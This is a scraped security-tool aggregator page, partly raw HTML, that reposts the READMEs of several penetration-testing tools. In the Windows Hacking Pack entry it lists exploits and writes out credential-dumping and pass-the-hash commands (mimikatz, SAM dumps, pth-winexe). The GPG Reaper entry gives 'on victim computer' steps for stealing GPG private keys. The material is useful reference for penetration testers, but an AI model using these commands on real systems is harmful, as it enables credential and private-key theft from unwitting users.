Windows, Nintendo, and LinkedIN – Hack Naked News #170

This week, Apple and issues of trust, LinkedIN leaks, spending money on ransomware, dead fingerprints, mysterious medical hacks, and hacking the Nintendo switch with no patches even possible? Jason Wood from Paladin Security joins us for expert commentary, and more on this episode of Hack Naked News! Security News ‘iTunes Wi-Fi Sync’ Feature Could Let […]
The post Windows, Nintendo, and LinkedIN – Hack Naked News #170 appeared first on Security Weekly.


Cookiescanner – Tool For Check The Cookie Flag In Multiple Sites

Tool for check the cookie flag in multiple sites.IntroTool created to do more easy the process of check the cookie flag when we are analyzing multiple web servers.If you want to know for why could be useful this tools? [options] Example: ./ -i ips.txtOptions: -h, –help show this help message and exit -i INPUT, –input=INPUT File input with the list of webservers -u URL, –url=URL URL -f FORMAT, –format=FORMAT Output format (json, xml, csv, normal, grepable) -g GOOGLE, –google=GOOGLE Search in google by domain –nocolor Disable color (for the normal format output) -I, –info More info Performance: -t TIMEOUT Timeout of response -d DELAY Delay between requestsRequirementsrequests >= 2.8.1BeautifulSoup >= 4.2.1Install requirementspip3 install –upgrade -r requirements.txtAuthorManuel Mancera ( Cookiescanner


WHP – Microsoft Windows Hacking Pack

M$ Windows Hacking Pack===========Tools here are from different sources. The repo is generally licensed with WTFPL, but some content may be not (eg. sysinternals).”pes" means "PE Scambled". It’s useful sometimes.Remote Exploits===========Windows 2000 / XP SP1MS05-039 Microsoft Plug and Play Service Overflow, Works with SSDP too XP/NT (beofre SP2)MS03-026 Microsoft RPC DCOM Interface Overflow ( XP (SP2 and SP3) (can be used also for priv esc)MS08-067 Remote Stack Overflow Vulnerability Exploit (srvscv) Windows 7 and Server 2008 R2 (x64) All Service PacksMS17-010 aka "Eternal Blue" Server 2016 (DoS, may lead to exec)"Fuzzing SMB" video, showing the crash: Escalation===========First, if you have meterpreter, it may be a good idea to try "getsystem".srvcheck3.exe=====Privilege escalation for Windows XP SP2 and beforeThis can exploit vulnerable services. srvcheck3.exe -m upnphost -H -c "cmd.exe /c c:\Inetpub\wwwroot\shell.exe"KiTrap0D.tar=====Privilege escalation for Microsoft Windows NT/2000/XP/2003/Vista/2008/7MS10-015 / CVE-2010-0232 / ways of exploits listed=====Windows XP/2003MS11-080 → Local Privilege Escalation Exploit Afd.sys Vista/7 CVE: 2010-4398 Elevation of Privileges (UAC Bypass) 8.1 (and before)MS14-058 → TrackPopupMenu Privilege Escalation 8.1 (and before)MS15-051 Win32k LPE vulnerability used in APT attack "taihou32" 10 (and before)Hot Potato (nbns spoof + wpad + smb ntlm) 10 (and before)Link/URL based exploitation of NetNTLM hashes. Eg. sending link file in email or dropping on file share.Technique presented here: XP SP2 (and before)srvcheck3.exe – upnp service or SSDPSRV service Windows XP/2003MS11-080 → Local Privilege Escalation Exploit Afd.sys Vista/7 CVE: 2010-4398 Elevation of Privileges (UAC Bypass) 8.1 (and before)MS14-058 → TrackPopupMenu Privilege Escalation 8.1 (and before)MS15-051 Win32k LPE vulnerability used in APT attack "taihou32" NT/2K/XP/2K3/Vista/2K8/7/8KiTrap0D – EPATHOBJ Local Ring Exploit 10 (and before)Hot Potato (nbns spoof + wpad + smb ntlm) XP (and after).lnk exploit for receiving NetNTLM hashes remotely. files if contain samWindows/system32/config/SAM/WINDOWS/repair/SAMregedit.exe HKEY_LOCAL_MACHINE -> SAMTools to get the SAM database if locked: pwdump, samdump, samdump2, Cain&AbelOtherwise just copy.Dump SAM through shadow volumeIf it can be created the database could be copied from this.Vista command: vssadmin create shadowServer 2008 command: diskshadowWindows Credentials EditorWCE / Windows Credentials Editor can recover password hashes from LSASS – supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit versions). Mimikatz dumpingmimikatz # privilege::debugmimikatz # sekurlsa::logonpasswordsmimikatz # lsadump::samCachedump aka In-memory attacks for SAM hashes / Cached Domain Credentialsfgdump.exe (contains pwdump and cachedump, can read from memory)SAM dump (hive)"A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data."Dump SAM, then spray hasheskeimpx (try hashes with different users, against domain accounts) dumping (memory) / Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows XPLSAdump2, LSASecretsDump, pwdumpx, gsecdump or Cain & Abel (before Windows 8.1)pth-winexe –user=pc.local/Administrator%aad3b435b51404eeaad3b435b514t234e:1321ae011e02ab0k26e4edc5012deac8 // cmdPassTheTicket (Kerberos)mimikatz can do itDuplicate Access Tokens (if admin access token can be used, it’s win) "Kidnapping"MS 09-12, Churrasco.bin shell.bin (runs shell.bin with nt system authority) notablelo toolspsexec, smbshell, metasploit’s psexec, etc – It allows to visualize connections in an AD domain and find fast escalation ways.To Be Added===========- –> Stuff for dumping passwords- openvpn- evilgradeHashes (SHA256) and VirusTotal scans===========8ee65368afcd98ea660f5161f9cbe0c4c08863018f28e5eb024d8db58b234333 AwesomerShell.tar7487ec568b6e2547ef30957610e60df3089d916f043b02da1167959dd9e0c051 KiTrap0D.tar96f17857f3eb28a7d93dad930bc099a3cb65a9a2afb37069bfd1ba5ec5964389 LICENSE.txtb3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e ncat.exeda24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b ncat_pes.exebe4211fe5c1a19ff393a2bcfa21dad8d0a687663263a63789552bda446d9421b nc.exe56580f1eebdccfbc5ce6d75690600225738ddbe8d991a417e56032869b0f43c7 nmap-7.12-setup-gui.exe0cb7c3d9c4a0ce86f44ab4d0db2de264b64abbb83ef453afe05f5fddf330a1c5 nmap-7.12-win32_commandline.zip976c216119d5627afc9ad29fd4f72e38de3711d65419fda6482bc795e0ebf654 plink.exe952aa0bfb7ea58669fb50b945a09e9e69cd178739c5d1281a45ecfc54cc7f92f srvcheck3.execa5214e14ed5e879dd000a8a13895c474c89248386e9d337dd43f105a70f4170 PEScrambler.exeef0f4bf2267b866a00b3e60c0e70f7f37cc5529fee417a625e502b3c93d215d9 SysinternalsSuite.zip8e9bc40efd17a37a4ecf7ada7a3d739f343e207abe4e17f05a531baccc607336 windows-privesc-check.exe6c367696e6cc8e6093426dbd19daf13b2375b0c078387ae6355519522d23b0fd windows-privesc-check.pyffe3808989bdfe986b17023e5d6583d49d644182e81234dc1db604e260ba76c9 fgdump.exec36225d4515a92b905f8337acfd3d365cb813a2654e65067dbdba4fc58e7126a kaht2.zip2951e49efbc9e18d4641c0061f10da021b4bca2bd51247fe80107cbd334c195d mimikatz_2-1.zip0682a92bc96a66cf3e3eca1e44296838b9baad4feef0c391fc48044e039e642a ms08-067_exploit_31874.pycc4b4eceb04142b9e0794be029302feb33cf58c6a0cd1fdca3ff611df9b83827 ms08-067_exploit_7132.py950bbdde2cc92799675c138fd8dfb2b60f0c01759533bc1a6993559508bd131e Responder.tar54bd6cccf4c74604eb9956ce167a3ea94a06fabf4954e691d020023f8827c448 samdump2.exeece925f85dc15b816dacacbb92ad41045f0cc58c2e10c5d3b66723ae11cf65c8 wce_getlsasrvaddr.exec6333c684762ed4b4129c7f9f49c88c33384b66dfb1f100e459ec6f18526dff7 wce_v1_41beta_universal.exeecbac2a6c0bf8dbc7bed2370ed098cd43a56b0d69a0db1d5715751270711f1d6 wce_v1_42beta_x32.exe5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 sources/nc110.tgz47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 sources/rdp2tcp-0.1.tar.gz33d109696d22b7e89f4eac6d07f4b4461551247ce2bfcbead09373ce39364f78 sources/srvcheck3.zipf706df25bb061a669b13ff76c121a8d72140406c7b0930bae5dcf713f9520a56 sources/3proxy-0.8.6.tar.gz7e8cfbf10bcc91fa9b9a60d3335d4a52bd6d4b6ca888533dbdd2afc86bebb5cc sources/3proxy-0.9-devel.tgzdec12905822ea64676d0ec58b62c00631ef8ddde2c700ffe74bfcf9026f17d81 sources/fgdump-2.1.0.tar.bz2352888e441be33ae6266cfac1a072d52cfaafd65cc33b07daa51600f1cd803ca sources/impacket_0-9-15.tar21faf49ae9ff08054214675f18d813bcf042798c325d68ae8b2417a119b439f4 sources/keimpx-0.3-dev.tar16136256911c31f7c56eef415b11e14c13abe89cface46df78033456194eddfd sources/mimikatz-2016-06.zip602659af30c565750fa01650e0a223d26355b5df98f2fbc30e3a6c593ed4e526 sources/samdump2-3.0.0.tar.bz2ncat.exeSHA256: b3991cbab99149f243735750690b52f38a4a9903a323c8c95d037a1957ec058e da24e2a2fefc4e53c22bc5ba1df278a0f644ada6e95f6bc602d75f5158a5932b 5b3fda14e972d908896a605293f4634a72e2968278117410e12d8b3faf9a3976 47ec6f337a386828005eeaa0535b9b31c3fb13f657ce7eb56bcaf7ce50f9fdf9 WHP


JCS – Joomla Vulnerability Component Scanner

JCS (Joomla Component Scanner) made for penetration testing purpose on Joomla CMS JCS can help you with the latest component vulnerabilities and exploits. The database can update from several resources and a Crawler has been implemented to find components and component’s link.This version supports Exploitdb and Packetstorm vulnerabilities to create a database for joomla components JCS can also create a Report in HTML for you.Features:Multi-ThreadDelay between requestsCustom Http HeadersSupports Http-ProxySupports Http Authentication:BASICDIGESTComponent crawler base by Regex-PatternComponent’s Page Identification By:Page ComparisonRegex PatternSearching in HTML tags example: not found</title>Checking Http Status CodeReport Sample:Download JCS</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-97058" class="post-97058 post type-post status-publish format-standard hentry category-uncategorized tag-crawler tag-dirbuster tag-pencrawler tag-penetration-testing tag-web tag-web-crawler tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="" rel="bookmark">PenCrawLer – An Advanced Web Crawler And DirBuster</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>An Advanced Web Crawler and DirBuster PeNCrawLer is an advanced webcrawler and dirbuster designed to using in penetration testing based on Windows Os.Web Crawler Features:Follow RedirectsRendering JavascriptExtract links from custom HTML-ElementsExtract links with Regex-PatternBlack-List extentionsWhite-List extentionsDownlaod files from white-list extentionsSetting-Up limit for crawling similar linksSearching for string in:UrlResponseAutomatic Form SubmissionSupport Http-ProxySupported Authentication:BasicDigestThrottling modeDirBuster Features:Dictionary attackBruteforce attackCustom bruteforce charsetCustom request method:GET ONLYAuto-Switch( GET and HEAD )Recursive modeBruteforce directoriesBruteforce files with custom extentionsAutomatic page detection by:Failure status-codeSuccess status-codeRegex patternHTML sourceDownload PenCrawLer</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-97008" class="post-97008 post type-post status-publish format-standard hentry category-uncategorized tag-13411 tag-application-news tag-application-security-weekly tag-applications tag-ftp tag-javascript tag-macos tag-mgetting tag-oceanlotus tag-pc tag-warning tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="" rel="bookmark">Windows, MacOS, & Javascript – Application Security Weekly #12</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>In the news, Attacking an FTP Client: MGETting more than you bargained for, Warning: Your Windows PC can get hacked by just visiting a site, new MacOS backdoor linked to OceanLotus, & more on this episode of Application Security Weekly! Full Show NotesVisit our website: Follow us on Twitter: https://www.twitter.comsecurityweekly<br /> The post Windows, MacOS, & Javascript – Application Security Weekly #12 appeared first on Security Weekly.</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-96984" class="post-96984 post type-post status-publish format-standard hentry category-uncategorized tag-linux tag-mac tag-multi-tabbed tag-pentest tag-sandcat tag-sandcat-browser tag-syhunt tag-syhunt-sandcat-browser tag-windows tag-wrapper"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="" rel="bookmark">Sandcat Browser 6.0 – Pentest And Developer-Oriented Web Browser</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit See also the docs directory and credits section below for a few more details about the Sandcat architecture.Directories/docs – Lua API documentation/packs – contents of uncompressed pack files/Common – common CSS, widgets and scripts package (Common.pak)/Resources – resources package (Resources.pak)/src – the main executable source and built-in resource files/core – user interface source/html – user interface resources (HTML)/lua – Lua API sourceDownloadCompiled binaries for Windows can be downloaded from the links below.6.0 64-bit6.0 32-bit6.0 32-bit with Pen-Tester Tools (included as part of Syhunt Community)CompilingFor compiling Sandcat, you will just need Catarinka and pLua.The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE – you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get – I will try to do the same soon.Some work is still needed before a Mac or Linux version materializes.ChangeLogRequest Viewer rewrite – with better display of requests and stability fixes.Disabled the Chromium’s XSS protection when in pentest mode.Simplified the tabbed UI – major tab code clean up and reorganization.Added drag and drop for items in the list editor.Fixed: occasional crash when extension called events of Lua objects.Additional stability.ContactTwitter: @felipedaragon, @syhuntEmail: felipe at syhunt.comIf you want to report a security bug, please see the docs\ file.Download Sandcat Browser 6.0</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-96047" class="post-96047 post type-post status-publish format-standard hentry category-uncategorized tag-exploitation tag-gpg-reaper tag-linux tag-penetration-testing tag-powershell tag-python tag-sha256 tag-sha512 tag-testing tag-windows"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="" rel="bookmark">GPG Reaper – Obtain/Steal/Restore GPG Private Keys From Gpg-Agent Cache/Memory</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Obtain/Steal/Restore GPG Private Keys from gpg-agent cache/memoryThis POC demonstrates method for obtaining GPG private keys from gpg-agent memory under Windows.Normally this should be possible only within 10 minutes time frame (–default-cache-ttl value).Unfortunately housekeeping() function (which is responsible for cache cleanup) is executed only if you are using GPG (there is no timer there).This means that in normal GPG usecase like: you sign some file then close GUI and do other task you password is still in gpg-agent memory (even if ttl expired).Attacker, who has access to your current session, can use this for stealing private key without knowing your passphrase.Installationpip install PGPyIf you got:TypeError: Error when calling the metaclass bases metaclass conflict: the metaclass of a derived class must be a (non-strict) subclass of the metaclasses of all its bases` when running python script then:then:pip install six==1.10.0Test1. Install Gpg4Win 3.0.32. Open command line and start agent with 2 seconds cache time:cd c:\Program Files (x86)\GnuPG\bintaskkill /im gpg-agent.exe /Fgpg-agent.exe –daemon –default-cache-ttl 23. Run Kleopatra and generate new key pair4. Sign some example test file5. Pinetry will popup and ask you for passphrase6. Repeat step 4-5. Each time pinetry shows up because our 2 seconds cache expired7. Run GPG reaperpowershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile testme.txtYou will see something like:[+] Detect GPG version 3.0.3[*] Readed jmp bytes: F6-05-E0-F9-45-00-04-0F-85[*] Readed housekeeping bytes: 55[+] Find sec key[+] Check key grip:[*] uid [ultimate] Adam Nowak <>[+] Found public key[*] Allocate memory at: 2d00000[+] Read debug log C:\Users\user\AppData\Local\Temp\gpg_D98F5932C4193BF82B9C773F13899DD586A1DE38_KqALSXPH.txt[+] Key dumped[*] Kill background Job[*] Restore bytesAs you can see we dump key. This is possible because we nopped the housekeeping function.8. Restore private key:python .\testme.txtPrivate key is dumped to the file:[+] Dump E057D86EE78A0EED070296C01BC8630ED9C841D0 – Adam Nowak <>IntroductionGPG-Agent is a daemon to manage private keys independently from any protocol.GUI interface communicates with agent using Assuan Protocol.By default agent caches your credentials.–default-cache-ttl n option set the time a cache entry is valid to n seconds.The default is 600 seconds. Each time a cache entry is accessed, its timer is reseted.Under Windows sign process looks like this:Crucial part here is housekeeping() function which is responsible for removing expired credentials from the memory.But there is one problem here: this function is executed only in two places (inside agent_put_cache and agent_get_cache).This means that cached credentials are NOT removed from the memory until some gpg-agent commands which uses agent_put_cache or agent_get_cache or agent_flush_cache are executed.UsageOn victim computer:powershell -ExecutionPolicy Bypass -File Gpg-Reaper.ps1 -OutputFile out.txtTransfer out.txt to your machine and restore private out.txtPrivate keys will be dumped into separate files.If GPG is installed outside default directories:Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exeIf you don’t want debug messages:Gpg-Reaper -Verbose $falsePost exploitation on machine with GPGLet’s assume that you are doing penetration testing and you obtain shell on computer with GPG installed.If you are lucky and user use GPG recently and cache not expire you can:1. Sign some file:Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exeGet list of keys available on specific machineKEYINFO –listS KEYINFO 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2 D – – – P – – -Set keygrip and message hashSIGKEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2# SHA512 of the messageSETHASH 10 7bfa95a688924c47c7d22381f20cc926f524beacb13f84e203d4bd8cb6ba2fce81c57a5f059bf3d509926487bde925b3bcee0635e4f7baeba054e5dba696b2bfPKSIGN2. Export private key:Run c:\Program Files (x86)\GnuPG\bin\gpg-connect-agent.exeGet wrapping keyKEYWRAP_KEY –exportExport a secret key from the key store. The key will be encrypted using the current session’s key wrapping key using the AESWRAP-128 algorithmEXPORT_KEY 38EA3CACAF3A914C5EC2D05F86CDBDCFE83077D2Unfortunately this is not working as expected and ask for password.Why? Because cmd_export_key() function is executing agent_key_from_file() with CACHE_MODE_IGNORE flag which means that cache won’t be used and user is asked for passphrase each time.Bypass private key export restrictionWe know that it’s not possible to export GPG key through gpg-agent without knowing password.But there is little quirk here. Agent has few options available:1. –debug-levelSelect the debug level for investigating problems. level may be a numeric value or a keyword:guru – All of the debug messages you can get.2. –log-file fileAppend all logging output to file. This is very helpful in seeing what the agent actually does.Let’s run agent using gpg-agent.exe –daemon –debug-level guru –log-file out.txt and sign some file.2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SIGKEY 590A068768B6A5CB4DD81CD4828C72AD8427DFE42018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETKEYDESC Please+enter+the+passphrase+to+unlock+the+OpenPGP+secret+key:%0A%22adam+nowak+<>%22%0A2048-bit+RSA+key,+ID+1308197BFDF95EAA,%0Acreated+2018-02-28.%0A2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- SETHASH 8 B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> OK2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- PKSIGN2018-03-04 18:21:15 gpg-agent[7180] DBG: agent_get_cache ‘590A068768B6A5CB4DD81CD4828C72AD8427DFE4’ (mode 2) …2018-03-04 18:21:15 gpg-agent[7180] DBG: … miss2018-03-04 18:21:15 gpg-agent[7180] starting a new PIN Entry2018-03-04 18:21:15 gpg-agent[7180] DBG: connection to PIN entry established2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c -> INQUIRE PINENTRY_LAUNCHED 3736 qt 1.1.0 /dev/tty – -2018-03-04 18:21:15 gpg-agent[7180] DBG: chan_0x0000008c <- END2018-03-04 18:21:18 gpg-agent[7180] DBG: agent_put_cache ‘590A068768B6A5CB4DD81CD4828C72AD8427DFE4’ (mode 2) requested ttl=02018-03-04 18:21:18 gpg-agent[7180] DBG: skey: (private-key2018-03-04 18:21:18 gpg-agent[7180] DBG: (rsa2018-03-04 18:21:18 gpg-agent[7180] DBG: (n #00EBF36EC96D941D126938C8BD7471F4BA4FF456A3034AD4EEBABABA3A6DE52445A2A67A4FB3DF8B90C6FD65D4B648D62749905DA1CEA7ECB8C31F7DC7ECF3B581668BA3041E6AD57DBE04D75E4C74612B310704B107AB49EE731FB991A7EE0B42E9BD4CD2FF09A2C5EC0AB13B4F53287706432BD03EFD5EA5AAC194CEF188018AAD3E394F14C587BB9A829E21EC39132652CED22B561EDB34E0E4FA64FD2E6035E035EA2592C2C89E71AD2B7A3B4BBFC14288D5448D6F7A64B37AB5AA80E5D34D03F9FC6375882D298DDBCB95F192C669DB141AA2B5F29F2DFC3B12DCB7385492C3EAD8F675901B78C69238A60E76163ED1130D9B4054A9A90AB8DA148280351F#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (e #010001#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (d #4B873C9EF0DB392524167FB7999742CA02FF095E9C16AFAB8D8D69407BDE1E2AC64279239B46032480762BCB17E09FE0AA9D3243B1E5B21280AF4B719C6974DFEBA5E63452D24AEDB9CE4DEC8B17B3E502082799CD8528A0D22C45181983CB0A0BCD4352C53DDDE3724807EC9EDB5538288286FB5DB6783E1AB765BD8AB6491B7021D17AEDD7494F902121C4B2C3BDB1447C0AABADD00FBD66EEC23882F9FC13DC967E6F1F5ABBAD9FA7E583360A31D3DAEC53CB46F981398CAAD511179E11B5BA04BDB79699AA58687287E9ABA9A820B22872C54078411A142AEA804497581AAD96FCBE4F01202AA4E687672973D26E7148AB7A269B60C68581817B1EB31DE5#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (p #00ED6EA59EE03412314BF288629568237A649FACC88C5D6E2F266A58D1CF6BA26254526F916FF7CFC6AF5B5ED0618CE00099DCFB9CB1F7C6BAD6945A8125ECD6A352E8056644A7336FFE2C203B098ED7767FD51101FD4842F1DED870DFD4D1F947D5FB7AB13E318C977AB875F86785F8B98260BB3BA1F6133D03C9296F22875E23#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (q #00FE67215C9C6FEF8C21C81A9B34AAB91FCD321D95E3641D7EFE4B89BBAD918CF94068AC89440147ED07E68EC65997568921DE740A504D2D99DDB997BE7DE09228678F544226F2D75F62447AECD7385773D9A7B0EF272B5CF4F32B4EFCB1B0B81893DE768B692D350CFB6B32A683DF773D66169A436DC233AD412FD438E366B6D5#)2018-03-04 18:21:18 gpg-agent[7180] DBG: (u #17BA591E668D2D78B1C74E5820A9FE31481232D34B6EBBC2004767512AD4835A42B0621EBE6CD4359BFD9B8DDA3DF234471C99B1CF553EBCF5019452143360FEC051024E43063913DD7A36FA1CA12C02FEAF07C4A4DA50C5286264BC38333C85371B13C704B1FA0265FA4DF17CC1E02B9E37ACA7D72AE40413CA6E5548107299#)))2018-03-04 18:21:18 gpg-agent[7180] DBG: hash: (data2018-03-04 18:21:18 gpg-agent[7180] DBG: (flags pkcs1)2018-03-04 18:21:18 gpg-agent[7180] DBG: (hash sha256 #B00357D0B85243BB34049E13FD5C328228BC53B317DF970594A1CED6CB89F4EA#))It looks like guru mode prints n, e, d, p, q and u numbers to log file. Knowing this we can calculate public and private key.Internally skey value is print by gcry_log_debugsxp() when DBG_CRYPTO is set:if (DBG_CRYPTO){ gcry_log_debugsxp (“skey", s_skey); gcry_log_debugsxp ("hash", s_hash);}FAQWhy PowerShell?Because this file can be run without any external dependencies on most modern Windows systems.GPG %file% not existgpg-connect-agent.exe, gpg-agent.exe or gpg.exe does not exist in default location.You can try to specify custom location using:Gpg-Reaper -GpgConnectAgentPath c:\gpg\gpg-connect-agent.exe -GpgAgentPath c:\gpg\gpg-agent.exe -GpgPath c:\gpg\gpg.exeNo gpg-agent runninggpg-agent.exe is not running on this system so we cannot restore private key.Unknown gpg-agent version, sha256:Currently this script support only specific versionsNo cached keyThere is no cached key in memory so we cannot restore private key.AttributionScythe icon made by Freepik from Of Suffering font by GraveTech.Download GPG Reaper</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-95568" class="post-95568 post type-post status-publish format-standard hentry category-uncategorized tag-debian tag-find tag-freebsd tag-linux tag-mac tag-rop tag-rp tag-tool tag-windows tag-x64 tag-x86"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="" rel="bookmark">Rp++ – Tool That Aims To Find ROP Sequences In PE/Elf/Mach-O X86/X64 Binaries</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O (doesn’t support the FAT binaries) x86/x64 binaries. It is open-source, documented with Doxygen (well, I’m trying to..) and has been tested on several OS: Debian / Windows 7 / FreeBSD / Mac OSX Lion (10.7.3). Moreover, it is x64 compatible. I almost forgot, it handles both Intel and AT&T syntax (beloved BeaEngine). By the way, the tool is a standalone executable.You can build very easily rp++ with CMake, it will generate a project file for your prefered IDE. There are some other things you will be able to do with rp++, like finding hexadecimal values, or strings, etc.Benchmark: Is it efficient ?Yeah, here are some benchmarks on Win7 x64, Intel i7 Q720 @ 1.6GHz, 4GB RAM:- Target: ntoskrnl.exe x64 version 6.1.7601.17790 D:\rp-win-x64.exe –file=ntoskrnl.exe –rop=8 > n ~80s for a total of 267356 gadgets found.- Target: chrome.exe x86 version 18.0.1025.168 D:\rp-win-x64.exe –file=chrome.exe –rop=8 > n ~13s for a total of 75459 gadgets found.- Target: cmd.exe x86 version v6.1.7600 D:\rp-win-x64.exe –file=cmd.exe –rop=8 > n ~15s for a total of 18818 gadgets found.- Target: bash x86 version D:\rp-win-x64.exe –file=bash-x86 –rop=8 > n ~12s for a total of 45385 gadgets found.Screenshotsrp++ on Win7 x64 / Debian Squeeze x64 / FreeBSD x64 / Mac OSX Lion x64: How to use it ?USAGE:./rp++ [-hv] [-f <binary path>] [-i <1,2,3>] [-r <positive int>] [–raw=<archi>] [–atsyntax] [–unique] [–search-hexa=<\x90A\x90>] [–search-int=<int in hex>]OPTIONS: -f, –file=<binary path> give binary path -i, –info=<1,2,3> display information about the binary header -r, –rop=<positive int> find useful gadget for your future exploits, arg is the gadget maximum size in instructions –raw=<archi> find gadgets in a raw file, ‘archi’ must be in the following list: x86, x64 –atsyntax enable the at&t syntax –unique display only unique gadget –search-hexa=<\x90A\x90> try to find hex values –search-int=<int in hex> try to find a pointer on a specific integer value -h, –help print this help and exit -v, –version print version information and exitWhere I can download standalone binaries ?There are an x86 and an x64 versions for Windows (compiled with VS 2010 on Win7 x64), Linux (compiled with gcc 4.4.5 on Debian x64 6.0.1), FreeBSD (compiled with gcc 4.2.1 on FreeBSD 8.2) and Mac OSX (compiled with gcc 4.2.1 on OSX 10.7.3 ; not statically linked): are the sha1sums:a2e71e88a5c14c81ae184258184e5d83082f184d *rp-fbsd-x6429c2d5462865d28042bffe9e723d25c19f0da1f7 *rp-fbsd-x8657e23ef42954a08c9833099d87544e2166c58b94 *rp-lin-x64efcaf2a9584a23559e3e5b109eb37cbde89f8b29 *rp-lin-x865c612b3eff470b613ea06ebbbb882f0aaef8e3b4 *rp-osx-x642e32273b657b44d6b9a56e89ec2e2c2731713d87 *rp-osx-x86e5e6930eb469e92f79b59941330f23daf62800be *rp-win-x64.exef83d4d9f9e73a60a31e495e2fbd2404c560f1a27 *rp-win-x86.exeDownload Rp++</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <article id="post-95416" class="post-95416 post type-post status-publish format-standard hentry category-uncategorized tag-c tag-crypto tag-cryptography tag-javascript tag-libsodium tag-linux tag-windows tag-x86"> <div class="top-category"><i class="fa fa-tag"></i> <span class="cat-links"><a href="" rel="category tag">HackerTor</a></span></div> <div class="post-inner"> <header class="entry-header"> <h1 class="entry-title"><a href="" rel="bookmark">Libsodium – A Modern, Portable, Easy To Use Crypto Library</a></h1> </header><!-- .entry-header --> <div class="entry-content"> <p>Sodium is a modern, easy-to-use software library for encryption, decryption, signatures, password hashing and more.It is a portable, cross-compilable, installable, packageable fork of NaCl, with a compatible API, and an extended API to improve usability even further.Its goal is to provide all of the core operations needed to build higher-level cryptographic tools.Sodium is cross-platforms and cross-languages. It runs on a variety of compilers and operating systems, including Windows (with MinGW or Visual Studio, x86 and x86_64), iOS and Android. Javascript and WebAssembly versions are also available and are fully supported. Bindings for all common programming languages are available and well-supported.The design choices emphasize security and ease of use. But despite the emphasis on high security, primitives are faster across-the-board than most implementations.DocumentationThe documentation is available on Gitbook and built from the libsodium-doc repository:libsodium documentation – online, requires Javascript.offline documentation in PDF, MOBI and ePUB formats.Integrity CheckingThe integrity checking instructions (including the signing key for libsodium) are available in the installation section of the documentation.Download Libsodium</p> <p><img class="feed-img" src="" /></p> <p>Link: <a href=""></a></p> </div><!-- .entry-content --> </div> </article><!-- #post-## --> <div class="navigation posts-navigation"><ul> <li class="active"><a href="">1</a></li> <li><a href="">2</a></li> <li><a href="">3</a></li> <li>…</li> <li><a href="">39</a></li> <li><a href="" >></a></li> </ul></div> </main><!-- #main --> </div><!-- #primary --> <div id="secondary" class="widget-area" role="complementary"> <aside id="search-2" class="widget widget_search"><form role="search" method="get" class="search-form" action=""> <label> <span 